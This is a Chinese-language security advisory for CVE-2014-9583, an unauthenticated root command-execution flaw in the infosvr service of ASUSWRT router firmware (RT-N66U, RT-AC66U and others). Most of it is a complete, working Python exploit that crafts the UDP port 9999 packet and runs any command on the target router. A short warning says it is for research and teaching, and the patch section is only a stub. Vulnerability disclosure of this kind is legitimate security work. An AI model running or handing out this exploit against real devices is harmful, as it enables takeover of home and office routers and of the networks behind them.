发布日期:2015-01-08
更新日期:2015-01-12
受影响系统:
Asus ASUSWRT 3.0.0.4.376_1071
Asus ASUSWRT 3.0.0.376.2524-g0013f52
描述:
CVE(CAN) ID: CVE-2014-9583
ASUSWRT是ASUS路由器固件。
ASUS WRT 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52版本中,infosvr的common.c没有正确检查请求的MAC地址,这可使远程攻击者通过向UDP端口9999,发送NET_CMD_ID_MANU_CMD数据包,利用此漏洞绕过身份验证并执行任意命令。受影响固件版本用在RT-AC66U, RT-N66U等其他路由器中。
<*来源:Friedrich Postelstorfer
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env python3
# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution
# Date: 2014-10-11
# Vendor Homepage:
# Software Link:
# Source code:
# Tested Version: 3.0.0.4.376_1071-g8696125
# Tested Device: RT-N66U
# Description:
# A service called "infosvr" listens on port 9999 on the LAN bridge.
# Normally this service is used for device discovery using the
# "ASUS Wireless Router Device Discovery Utility", but this service contains a
# feature that allows an unauthenticated user on the LAN to execute commands
# <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.
# "iboxcom.h" is in asuswrt/release/src/router/shared.
#
# Affected devices may also include wireless repeaters and other networking
# products, especially the ones which have "Device Discovery" in their features
# list.
#
# Using broadcast address as the IP address should work and execute the command
# on all devices in the network segment, but only receiving one response is
# supported by this script.
import sys, os, socket, struct
PORT = 9999
if len(sys.argv) < 3:
print('Usage: ' + sys.argv[0] + ' <ip> <command>', file=sys.stderr)
sys.exit(1)
ip = sys.argv[1]
cmd = sys.argv[2]
enccmd = cmd.encode()
if len(enccmd) > 237:
# Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server.
print('Values over 237 will give rise to undefined behaviour.', file=sys.stderr)
sys.exit(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', PORT))
sock.settimeout(2)
# Request consists of following things
# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
# PacketType [byte] ; NET_PACKET_TYPE_CMD
# OpCode [word] ; NET_CMD_ID_MANU_CMD
# Info [dword] ; Comment: "Or Transaction ID"
# MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp
# Password [byte[32]] ; Not checked at all
# Length [word]
# Command [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable
packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).ljust(512, b'\x00')
sock.sendto(packet, (ip, PORT))
# Response consists of following things
# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
# PacketType [byte] ; NET_PACKET_TYPE_RES
# OpCode [word] ; NET_CMD_ID_MANU_CMD
# Info [dword] ; Equal to Info of request
# MacAddress [byte[6]] ; Filled in for us
# Length [word]
# Result [byte[420]] ; Actually returns that amount
while True:
data, addr = sock.recvfrom(512)
if len(data) == 512 and data[1] == 22:
break
length = struct.unpack('<H', data[14:16])[0]
s = slice(16, 16+length)
sys.stdout.buffer.write(data[s])
sock.close()
建议:
厂商补丁:
Asus
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: